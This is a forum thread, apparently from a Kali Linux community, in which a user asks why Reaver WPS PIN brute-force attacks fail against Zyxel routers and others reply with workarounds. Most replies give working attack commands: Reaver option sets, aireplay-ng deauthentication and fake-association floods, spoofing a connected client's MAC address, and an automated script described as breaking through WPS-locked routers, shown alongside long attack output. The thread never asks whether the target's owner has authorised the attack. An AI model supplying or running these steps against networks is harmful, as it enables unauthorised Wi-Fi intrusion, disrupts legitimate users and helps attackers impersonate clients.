
Thread: Reaver Not Working on Specific Zyxel Brand Routers (Any Solution). And why ??

  1. Reaver Not Working on Specific Zyxel Brand Routers (Any Solution). And why ??

    I am using Kali Linux 1.1.0, Reaver 1.5 and Bully (latest Git). The problem is that Reaver is not working with most of the Zyxel brand routers; WPS is enabled. I tried Reaver and Bully on my friend's router and I get nothing, just "WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))", and after some time, when it successfully associates, I get an EAPOL warning and sometimes "WPS transaction Error". The interesting thing is that I tried Reaver on three Zyxel routers with the same result, and all of these routers' manufacturing dates are 2009-2010 (when the WPS flaw had not gone public). This problem is only related to Zyxel F4:3E:61:xx:xx:xx brands. So can someone explain to me why this is not working with these brands? And also help me to resolve this issue. (See the output below and the links for my Bully output and WPS settings screenshot.)

    http://i.imgur.com/NngbBZ7.png
    http://i.imgur.com/uSdk9wE.png


    reaver -i mon0 -b F4:3E:61:9C:80:xx -vv
    Reaver v1.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    [+] Waiting for beacon from F4:3E:61:9C:80:xx
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [+] Switching mon0 to channel 11
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Associated with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete. Elapsed time: 0d0h0m8s.
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [!] WARNING: 10 failed connections in a row
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete. Elapsed time: 0d0h0m15s.
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    ^C
    [+] Nothing done, nothing to save.

    Thanks in Advance..

  2. Any Solution ?? :/

  3. #3
    There's such a thing as a firmware update... Probably only set to WPS PBC.

  4. Never updated the firmware, and auto firmware updating is not supported either....
    And also I think WPS is not only set to PBC.. :/
    (Please see screenshot)..
    http://i.imgur.com/NngbBZ7.png
    Last edited by FurqanHanif; 2015-04-19 at 12:17.

  5. #5
    Could also be that the AP only acts as the registrar in the exchange and reaver also tries to be the registrar. You can't have 2 registrars. Try pressing "Add external registrar" and see if that works.

  6. Tried "Add External Registrar", same issue, and also when I restart/reboot my router or it restarts because of a power failure, both PIN sections become blank ......

  7. #7
    Try , -S -N -L -E -d 1 -r 9:61 options..

    best options for zyxel modems...

  8. Quote Originally Posted by Saydamination View Post
    Try , -S -N -L -E -d 1 -r 9:61 options..

    best options for zyxel modems...
    Tried every combination, same issue ...

  9. #9
    Umm... I think the Zyxel modem crashed after bruteforce...

    Use airodump-ng and listen to it... open Wireshark and read the messages..

    Beacons, probe responses...

    If you see so many block messages.. change your MAC address (macchanger)

    If you see so many error/failed messages.. probably the modem crashed..!

  10. Quote Originally Posted by Saydamination View Post
    Umm... I think the Zyxel modem crashed after bruteforce...

    Use airodump-ng and listen to it... open Wireshark and read the messages..

    Beacons, probe responses...

    If you see so many block messages.. change your MAC address (macchanger)

    If you see so many error/failed messages.. probably the modem crashed..!
    Here is the Wireshark output. Please see this....

    http://www.fileconvoy.com/dfl.php?id...c452c189a6e471

  11. #11
    Not every access point is vulnerable. At this time only 2 1/2 chipsets are vulnerable to even the pixiewps attack, which you don't seem to be using.

    The wps pin attack which you appear to be using requires much more time.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    When I've come across the error above, two things helped me.
    1. getting physically closer to target router, or try (-t20 <<< increase the receive timeout time)
    2. use a spoof client mac address and let aireplay-ng handle keeping association with router

    reaver options
    -A another program handles association
    --mac=00:11:00:11:00:11
    -t20

    Use the forked version of reaver by t6x that has pixiewps built in.

    Once you run the reaver linked above, report back the chipset.
    Last edited by nuroo; 2015-04-26 at 20:50.

  12. #12
    To FurqanHanif

    MTeams suggest you go here http://forum.aircrack-ng.org/index.php/topic,868.0.html

    There are two links for the VMR-MDK009x2 package. Read thru the help files, setup the config file and run this automated script against the router. This script is designed to break thru WPS locked routers BUT we use it all the time against unresponsive routers. Read thru the WPS Reaver issues 675,676 and 677. You want the VMR-MDK009x2 package. Any questions leave your comments in the aircrack forum.

  13. #13
    hi Furqanhanif,

    I saw your cap file... ... Target AP does not answer your request.. There is no probe response or any information about the modem...

    Modem is unusable....

    try other APs ..

    Good luck ...

  14. Quote Originally Posted by mmusket33 View Post
    To FurqanHanif

    MTeams suggest you go here http://forum.aircrack-ng.org/index.php/topic,868.0.html

    There are two links for the VMR-MDK009x2 package. Read thru the help files, setup the config file and run this automated script against the router. This script is designed to break thru WPS locked routers BUT we use it all the time against unresponsive routers. Read thru the WPS Reaver issues 675,676 and 677. You want the VMR-MDK009x2 package. Any questions leave your comments in the aircrack forum.
    WPS lock is not the problem (WPS is unlocked, I checked with wash); this script is also not working....

    Please see the Wireshark cap file and check.....

  15. Quote Originally Posted by Saydamination View Post
    hi Furqanhanif,

    I saw your cap file... ... Target AP does not answer your request.. There is no probe response or any information about the modem...

    Modem is unusable....

    try other APs ..

    Good luck ...
    But why is the target AP not replying??? WPS is enabled (I checked with wash), and only this type of AP is causing the problem..

  16. #16
    Quote Originally Posted by FurqanHanif View Post
    But why is the target AP not replying??? WPS is enabled (I checked with wash), and only this type of AP is causing the problem..
    I have a broken modem. When I run it seem as AP. WPS active .. But it does not answer me...

    Like in your post..

    Try this , and you will see that Anybody connect AP... Because Unusable...

    Code:
    airodump-ng -c X --bssid XX:XX:XX:XX:XX:XX mon0

  17. Quote Originally Posted by Saydamination View Post
    I have a broken modem. When I run it seem as AP. WPS active .. But it does not answer me...

    Like in your post..

    Try this , and you will see that Anybody connect AP... Because Unusable...

    Code:
    airodump-ng -c X --bssid XX:XX:XX:XX:XX:XX mon0
    Broken modem?? I don't get it. I am able to connect to the router and it's working fine; only Reaver is not working against it, even when WPS is enabled. Why..? Still unclear.

  18. #18
    To: FurquanHanif

    The question should not be why but how. People in these forums are trying to help you. If you do not want to use prepared tools then try to get the router to respond manually thru terminal windows. Here is a simple method:

    See if the router will respond to aireplay-ng

    Start reaver with a channel setting we suggest you use this command line. You must set a channel or aireplay-ng will not function.

    Leave it running

    Open a terminal window

    reaver -i mon0 -a -f -c 6 -b xx:xx:xx:xx:xx:xx -r 3:10 -S -E -vv -N -T 1 -t 20 -d 0 -x 30

    Set the correct channel and mac address

    Open another terminal window

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

    Leave it running

    Now Hit the router with some deauths

    Open a third terminal window

    aireplay-ng -0 10 -a xx:xx:xx:xx:xx:xx mon0

    Hit the router a few times with short deauth bursts

    Do not give up. We have had long unresponsive routers suddenly give up the WPS pin with one request from reaver.

    These are simple methods. More advanced techniques require automated scripts.

    MTeams

  19. #19
    If modem is working fine... Try this..

    First , connect AP like a normal user... (visit web sites) (for traffic)
    Later, try to find your password with different device ..

    reaver -i monX -c X -b XX:XX:XX:XX:XX:XX -vv

    You can receive M1 "probe response" message ( all information about modem )

    No Traffic = No probe response = Failed to associate with target AP...

    Or you can try this...

    Sometimes (I don't know why?) if I shake or turn my wireless adapter, reaver is running to test ...suddenly...

    turn your wireless adapter .. shake on air....
    Last edited by Saydamination; 2015-05-02 at 14:55. Reason: ok

  20. Quote Originally Posted by mmusket33 View Post
    To: FurquanHanif

    The question should not be why but how. People in these forums are trying to help you. If you do not want to use prepared tools then try to get the router to respond manually thru terminal windows. Here is a simple method:

    See if the router will respond to aireplay-ng

    Start reaver with a channel setting we suggest you use this command line. You must set a channel or aireplay-ng will not function.

    Leave it running

    Open a terminal window

    reaver -i mon0 -a -f -c 6 -b xx:xx:xx:xx:xx:xx -r 3:10 -S -E -vv -N -T 1 -t 20 -d 0 -x 30

    Set the correct channel and mac address

    Open another terminal window

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

    Leave it running

    Now Hit the router with some deauths

    Open a third terminal window

    aireplay-ng -0 10 -a xx:xx:xx:xx:xx:xx mon0

    Hit the router a few times with short deauth bursts

    Do not give up. We have had long unresponsive routers suddenly give up the WPS pin with one request from reaver.

    These are simple methods. More advanced techniques require automated scripts.

    MTeams

    Tried your commands, no luck. Stuck on sending identity response..
    See this cap file.
    http://www.fileconvoy.com/dfl.php?id...37fbe9b342adad

  21. Quote Originally Posted by Saydamination View Post
    If modem is working fine... Try this..

    First , connect AP like a normal user... (visit web sites) (for traffic)
    Later, try to find your password with different device ..

    reaver -i monX -c X -b XX:XX:XX:XX:XX:XX -vv

    You can receive M1 "probe response" message ( all information about modem )

    No Traffic = No probe response = Failed to associate with target AP...

    Or you can try this...

    Sometimes (I don't know why?) if I shake or turn my wireless adapter, reaver is running to test ...suddenly...

    turn your wireless adapter .. shake on air....
    Connected to the AP and then tried Reaver, same issue, no M1, M2 etc ....

  22. #22
    MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring a lot of data. Next spoof your mac for both the wifi device (i.e. example wlan0) AND the monitor (i.e. example mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx.

    Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.

    MTeams

  23. #23
    Quote Originally Posted by mmusket33 View Post
    MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring a lot of data. Next spoof your mac for both the wifi device (i.e. example wlan0) AND the monitor (i.e. example mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx.

    Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.

    MTeams
    This is also the way I do it. Spoofing the mac address in reaver command line -m, with a known client is often key. Also another technique that helps for tough routers is to let aireplay-ng handle the association.
    Reaver .......standard options............-A (let another program handle association) -m (spoofed client mac)

    Use the -h option also in aireplay-ng, same as spoofed client mac.
    Aireplay-ng .....standard options.......-h (spoofed client mac)

    Distance to router is also a major factor. If you can't get a known vulnerable chipset, then distance to router is likely a new issue.

  24. #24
    This is good to know. I'm running a Zyxel PK5001Z router from my ISP and I'm having this same issue. I'll try the recommendations in this thread and report back.

  25. Quote Originally Posted by nuroo View Post
    This is also the way I do it. Spoofing the mac address in reaver command line -m, with a known client is often key. Also another technique that helps for tough routers is to let aireplay-ng handle the association.
    Reaver .......standard options............-A (let another program handle association) -m (spoofed client mac)

    Use the -h option also in aireplay-ng, same as spoofed client mac.
    Aireplay-ng .....standard options.......-h (spoofed client mac)

    Distance to router is also a major factor. If you can't get a known vulnerable chipset, then distance to router is likely a new issue.
    I tried everything including MAC spoofing stuff, no luck ... :/

  26. Quote Originally Posted by mmusket33 View Post
    MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring a lot of data. Next spoof your mac for both the wifi device (i.e. example wlan0) AND the monitor (i.e. example mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx.

    Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.

    MTeams
    Tried, not working..

  27. #27
    Modem crash or WPS is inactive...

    Try your luck with Zyxel Utility ... If you have it....
